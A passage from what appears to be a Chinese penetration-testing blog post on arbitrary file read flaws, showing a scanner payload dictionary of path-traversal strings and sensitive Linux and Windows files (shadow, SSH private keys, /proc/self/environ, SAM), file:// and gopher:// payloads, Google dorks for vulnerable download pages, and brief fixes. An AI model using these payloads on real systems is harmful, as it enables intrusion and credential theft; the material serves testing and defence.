class="line">&#x2F;etc&#x2F;httpd&#x2F;conf&#x2F;httpd.conf</span><br><span class="line">&#x2F;etc&#x2F;apache2&#x2F;httpd.conf</span><br><span class="line">&#x2F;etc&#x2F;apache2&#x2F;apache2.conf</span><br><span class="line"></span><br><span class="line">nginx：</span><br><span class="line">&#x2F;etc&#x2F;nginx&#x2F;nginx.conf</span><br><span class="line">&#x2F;usr&#x2F;local&#x2F;nginx&#x2F;conf&#x2F;nginx.conf</span><br><span class="line">&#x2F;usr&#x2F;local&#x2F;etc&#x2F;nginx&#x2F;nginx.conf</span><br><span class="line"></span><br><span class="line">redis：</span><br><span class="line">&#x2F;etc&#x2F;redis.conf</span><br><span class="line"></span><br><span class="line"># defaut</span><br><span class="line">download.php?file&#x3D;download.php</span><br><span class="line"></span><br><span class="line"># index</span><br><span class="line">index&#x2F;php</span><br><span class="line">..&#x2F;index.php</span><br><span class="line">..&#x2F;..&#x2F;index.php</span><br><span class="line">..&#x2F;..&#x2F;..&#x2F;index.php</span><br><span class="line">..&#x2F;..&#x2F;..&#x2F;..&#x2F;index.php</span><br><span class="line">..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;index.php</span><br><span class="line">..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;index.php</span><br><span class="line">..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;index.php</span><br><span class="line">..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;index.php</span><br><span class="line">..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;index.php</span><br><span class="line">..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;index.php</span><br><span class="line">..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;index.php</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"># system proc</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;cmdline</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;stat</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;status</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;environ</span><br><span class="line">&#x2F;proc&#x2F;verison</span><br><span class="line">&#x2F;proc&#x2F;cmdline</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;cwd</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;0</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;1</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;2</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;3</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;4</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;5</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;6</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;7</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;8</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;9</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;10</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;11</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;12</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;13</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;14</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;15</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;16</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;17</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;18</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;19</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;20</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;21</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;22</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;23</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;24</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;25</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;26</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;27</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;28</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;29</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;30</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;31</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;32</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;33</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;34</span><br><span class="line">&#x2F;proc&#x2F;self&#x2F;fd&#x2F;35</span><br><span class="line">&#x2F;proc&#x2F;sched_debug</span><br><span class="line">&#x2F;proc&#x2F;mounts</span><br><span class="line">&#x2F;proc&#x2F;net&#x2F;arp</span><br><span class="line">&#x2F;proc&#x2F;net&#x2F;route</span><br><span class="line">&#x2F;proc&#x2F;net&#x2F;tcp</span><br><span class="line">&#x2F;proc&#x2F;net&#x2F;udp</span><br><span class="line">&#x2F;proc&#x2F;net&#x2F;fib_trie</span><br><span class="line">&#x2F;proc&#x2F;version</span><br><span class="line"></span><br><span class="line"># ssh</span><br><span class="line">&#x2F;root&#x2F;.ssh&#x2F;id_rsa</span><br><span class="line">&#x2F;root&#x2F;.ssh&#x2F;id_rsa.pub</span><br><span class="line">&#x2F;root&#x2F;.ssh&#x2F;authorized_keys</span><br><span class="line">&#x2F;etc&#x2F;ssh&#x2F;sshd_config</span><br><span class="line">&#x2F;var&#x2F;log&#x2F;secure</span><br><span class="line"></span><br><span class="line"># network</span><br><span class="line">&#x2F;etc&#x2F;sysconfig&#x2F;network-scripts&#x2F;ifcfg-eth0</span><br><span class="line">&#x2F;etc&#x2F;syscomfig&#x2F;network-scripts&#x2F;ifcfg-eth1</span><br><span class="line"></span><br><span class="line"># application</span><br><span class="line">&#x2F;opt&#x2F;nginx&#x2F;conf&#x2F;nginx.conf</span><br><span class="line">&#x2F;var&#x2F;www&#x2F;html&#x2F;index.html</span><br><span class="line">&#x2F;root&#x2F;.mysql_history</span><br><span class="line">&#x2F;root&#x2F;.wget-hsts</span><br><span class="line">&#x2F;etc&#x2F;my.cnf</span><br><span class="line"></span><br><span class="line"># common</span><br><span class="line">&#x2F;etc&#x2F;passwd</span><br><span class="line">&#x2F;etc&#x2F;shadow</span><br><span class="line">&#x2F;etc&#x2F;hosts</span><br><span class="line">&#x2F;root&#x2F;.bash_history</span><br><span class="line">&#x2F;root&#x2F;.ssh&#x2F;authorized_keys</span><br><span class="line">&#x2F;root&#x2F;.mysql_history</span><br><span class="line">&#x2F;root&#x2F;.wget-hsts</span><br><span class="line">&#x2F;var&#x2F;www&#x2F;html&#x2F;index.html</span><br><span class="line"></span><br><span class="line"># protocol</span><br><span class="line">file:&#x2F;&#x2F;&#x2F;etc&#x2F;passwd</span><br><span class="line">gopher:&#x2F;&#x2F;&#x2F;etc&#x2F;passwd</span><br><span class="line">ftp:&#x2F;&#x2F;</span><br><span class="line"></span><br><span class="line"># SSRF 内网探测</span><br><span class="line">url&#x3D;http:&#x2F;&#x2F;10.29.5.24</span><br><span class="line"></span><br><span class="line"># Windows</span><br><span class="line">C:\boot.ini  &#x2F;&#x2F;查看系统版本</span><br><span class="line">C:\Windows\System32\inetsrv\MetaBase.xml  &#x2F;&#x2F;IIS配置文件</span><br><span class="line">C:\Windows\repair\sam  &#x2F;&#x2F;存储系统初次安装的密码</span><br><span class="line">C:\Program Files\mysql\my.ini  &#x2F;&#x2F;Mysql配置</span><br><span class="line">C:\Program Files\mysql\data\mysql\user.MYD  &#x2F;&#x2F;Mysql root</span><br><span class="line">C:\Windows\php.ini  &#x2F;&#x2F;php配置信息</span><br><span class="line">C:\Windows\my.ini  &#x2F;&#x2F;Mysql配置信息</span><br></pre></td></tr></table></figure>

<h1 id="5-漏洞复现的建议"><a href="#5-漏洞复现的建议" class="headerlink" title="5. 漏洞复现的建议"></a>5. 漏洞复现的建议</h1><h2 id="5-1-Google-Hacking-Dorks"><a href="#5-1-Google-Hacking-Dorks" class="headerlink" title="5.1 Google Hacking Dorks"></a>5.1 Google Hacking Dorks</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">inurl:&quot;readfile.php?file&#x3D;&quot;</span><br><span class="line">inurl:&quot;download.php?file&#x3D;&quot;</span><br><span class="line">inurl:&quot;read.php?filename&#x3D;&quot;</span><br><span class="line">inurl:&quot;down.php?file&#x3D;&quot;</span><br></pre></td></tr></table></figure>

<h2 id="5-2-历史漏洞案例"><a href="#5-2-历史漏洞案例" class="headerlink" title="5.2 历史漏洞案例"></a>5.2 历史漏洞案例</h2><p>resin 任意文件读取<br>glassfish 任意文件读取<br>elasticsearch 任意文件读取</p>
<h1 id="6-修复方案"><a href="#6-修复方案" class="headerlink" title="6. 修复方案"></a>6. 修复方案</h1><p>以下仅说明若干种修复思路，可能会有考虑不周的地方</p>
<ol>
<li>php.ini 配置 open_basedir</li>
<li>用户输入配置白名单</li>
<li>不允许包含 <code>../</code></li>
</ol>
<h1 id="7-参考资料"><a href="#7-参考资料" class="headerlink" title="7. 参考资料"></a>7. 参考资料</h1><p><a href="https://blog.netspi.com/directory-traversal-file-inclusion-proc-file-system" target="_blank" rel="noopener">1. Directory Traversal, File Inclusion, and The Proc File System</a></p>
<p><a href="https://www.cdxy.me/?p=554" target="_blank" rel="noopener">2. 漏洞手记-任意文件读取-cdxy</a></p>
<p><a href="http://xdxd.love/2016/05/23/一个任意文件读取漏洞分析/" target="_blank" rel="noopener">3. 一个任意文件读取漏洞记录</a></p>
<p><a href="https://www.leavesongs.com/PENETRATION/arbitrary-files-read-via-static-requests.html" target="_blank" rel="noopener">4. 【搭建测试环境的参考】新型任意文件读取漏洞的研究 – phith0n</a></p>
<p><a href="https://blog.csdn.net/cic10235/article/details/52052522" target="_blank" rel="noopener">5. 【白盒审计视角】WEB 安全系列之如何挖掘任意文件读取漏洞</a></p>
<ul>
<li>#<a href="http://wp.blkstone.me/tag/linux/" target="_blank" rel="noopener">linux</a></li>
<li>#<a href="http://wp.blkstone.me/tag/php/" target="_blank" rel="noopener">php</a></li>
<li>#<a href="http://wp.blkstone.me/tag/渗透测试/" target="_blank" rel="noopener">渗透测试</a></li>
</ul>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/01/29/Orancle%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93/1/" rel="next" title="Orancle注入总结/1">
                <i class="fa fa-chevron-left"></i> Orancle注入总结/1
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/02/13/gadget%E9%93%BE%E5%AD%A6%E4%B9%A0/Commons%20Collections/1/" rel="prev" title="gadget链学习/Commons Collections/1">
                gadget链学习/Commons Collections/1 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/user.jpg"
                alt="Virusday" />
            
              <p class="site-author-name" itemprop="name">Virusday</p>
              <p class="site-description motion-element" itemprop="description">学习的日常</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">72</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">10</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <!-- modify icon to fire by szw -->
                <i class="fa fa-history fa-" aria-hidden="true"></i>
                近期文章
              </div>
              <ul class="links-of-blogroll-list">
                
                
                  <li class="recent_posts_li">
                    <a href="/2021/07/19/java/java%E9%80%86%E5%90%91/1/" title="java/java逆向/1" target="_blank">java/java逆向/1</a>
                  </li>
                
                  <li class="recent_posts_li">
                    <a href="/2021/07/15/%E8%BF%87d%E7%9B%BE%E5%B0%8F%E9%A9%AC%E5%88%86%E6%9E%90/1/" title="过d盾小马分析/1" target="_blank">过d盾小马分析/1</a>
                  </li>
                
                  <li class="recent_posts_li">
                    <a href="/2021/06/30/java/shiro%E9%85%8D%E5%90%88spring/1/" title="java/shiro配合spring/1" target="_blank">java/shiro配合spring/1</a>
                  </li>
                
                  <li class="recent_posts_li">
                    <a href="/2021/06/15/java/el%E8%A1%A8%E8%BE%BE%E5%BC%8F%E4%B8%8ESPel%E8%A1%A8%E8%BE%BE%E5%BC%8F/1/" title="java/el表达式与SPel表达式/1" target="_blank">java/el表达式与SPel表达式/1</a>
                  </li>
                
                  <li class="recent_posts_li">
                    <a href="/2021/06/07/java/java%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%BA%95%E5%B1%82/1/" title="java/java命令执行底层/1" target="_blank">java/java命令执行底层/1</a>
                  </li>
                
              </ul>
            </div>
          
          
          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#1-利用指南"><span class="nav-number">1.</span> <span class="nav-text">1. 利用指南</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-1-判断系统类型-Linux的具体发行版"><span class="nav-number">1.1.</span> <span class="nav-text">1.1 判断系统类型 (Linux的具体发行版)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#1-2-其他说明-服务器进程权限判断"><span class="nav-number">1.2.</span> <span class="nav-text">1.2 其他说明 (服务器进程权限判断)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#1-3-根据端口开放情况"><span class="nav-number">1.3.</span> <span class="nav-text">1.3 根据端口开放情况</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#1-4-无痕反弹-shell"><span class="nav-number">1.4.</span> <span class="nav-text">1.4 无痕反弹 shell</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#2-白盒测试"><span class="nav-number">2.</span> <span class="nav-text">2. 白盒测试</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#2-1-常见代码最简化案例"><span class="nav-number">2.1.</span> <span class="nav-text">2.1 常见代码最简化案例</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-2-白盒测试思路"><span class="nav-number">2.2.</span> <span class="nav-text">2.2 白盒测试思路</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#3-黑盒测试"><span class="nav-number">3.</span> <span class="nav-text">3. 黑盒测试</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#3-1-黑盒测试的特征"><span class="nav-number">3.1.</span> <span class="nav-text">3.1 黑盒测试的特征</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-2-判断类型"><span class="nav-number">3.2.</span> <span class="nav-text">3.2 判断类型</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#4-扫描器开发参考"><span class="nav-number">4.</span> <span class="nav-text">4. 扫描器开发参考</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#4-1-payload-参考"><span class="nav-number">4.1.</span> <span class="nav-text">4.1 payload 参考</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#补充！"><span class="nav-number">4.2.</span> <span class="nav-text"># 补充！</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-2-字典"><span class="nav-number">4.3.</span> <span class="nav-text">4.2 字典</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#4-2-1-关于字典各字段的简要说明"><span class="nav-number">4.3.1.</span> <span class="nav-text">4.2.1 关于字典各字段的简要说明</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-2-2-字典内容"><span class="nav-number">4.4.</span> <span class="nav-text">4.2.2 字典内容</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#5-漏洞复现的建议"><span class="nav-number">5.</span> <span class="nav-text">5. 漏洞复现的建议</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#5-1-Google-Hacking-Dorks"><span class="nav-number">5.1.</span> <span class="nav-text">5.1 Google Hacking Dorks</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#5-2-历史漏洞案例"><span class="nav-number">5.2.</span> <span class="nav-text">5.2 历史漏洞案例</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#6-修复方案"><span class="nav-number">6.</span> <span class="nav-text">6. 修复方案</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#7-参考资料"><span class="nav-number">7.</span> <span class="nav-text">7. 参考资料</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <!--
<div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-id-card"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Virusday</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">90.8k</span>
  
</div>
-->


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Virusday</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>









        







        
      </div>
    </footer>

    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
